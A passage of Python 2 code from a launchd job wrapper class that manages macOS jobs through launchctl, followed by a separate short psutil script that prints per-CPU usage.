proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
def __del__(self):
'''Attempt to clean up'''
if self.plist:
launchctl_cmd = ['/bin/launchctl', 'unload', self.plist_path]
dummy_result = subprocess.call(launchctl_cmd)
try:
self.stdout.close()
self.stderr.close()
except AttributeError:
pass
try:
os.unlink(self.plist_path)
os.unlink(self.stdout_path)
os.unlink(self.stderr_path)
except (OSError, IOError):
pass
def start(self):
'''Start the launchd job'''
launchctl_cmd = ['/bin/launchctl', 'start', self.label]
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
else:
if (not os.path.exists(self.stdout_path) or
not os.path.exists(self.stderr_path)):
# wait a second for the stdout/stderr files
# to be created by launchd
time.sleep(1)
try:
# open the stdout and stderr output files and
# store their file descriptors for use
self.stdout = open(self.stdout_path, 'r')
self.stderr = open(self.stderr_path, 'r')
except (OSError, IOError), err:
raise LaunchdJobException(err)
def stop(self):
'''Stop the launchd job'''
launchctl_cmd = ['/bin/launchctl', 'stop', self.label]
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
err = proc.communicate()[1]
if proc.returncode:
raise LaunchdJobException(err)
def info(self):
'''Get info about the launchd job. Returns a dictionary.'''
info = {'state': 'unknown',
'PID': None,
'LastExitStatus': None}
launchctl_cmd = ['/bin/launchctl', 'list']
proc = subprocess.Popen(launchctl_cmd, shell=False, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = proc.communicate()[0]
if proc.returncode or not output:
return info
else:
lines = str(output).splitlines()
# search launchctl list output for our job label
job_lines = [item for item in lines
if item.endswith('\t' + self.label)]
if len(job_lines) != 1:
# unexpected number of lines matched our label
return info
job_info = job_lines[0].split('\t')
if len(job_info) != 3:
# unexpected number of fields in the line
return info
if job_info[0] == '-':
info['PID'] = None
info['state'] = 'stopped'
else:
info['PID'] = int(job_info[0])
info['state'] = 'running'
if job_info[1] == '-':
info['LastExitStatus'] = None
else:
info['LastExitStatus'] = int(job_info[1])
return info
def returncode(self):
'''Returns the process exit code, if the job has exited; otherwise,
returns None'''
info = self.info()
if info['state'] == 'stopped':
return info['LastExitStatus']
else:
return None
def main():
'''placeholder'''
pass
if __name__ == '__main__':
main()
|
import psutil
percpu = psutil.cpu_percent(interval=None, percpu=True)
for i in range(len(percpu)):
print(i+1,"-" ,percpu[i])
|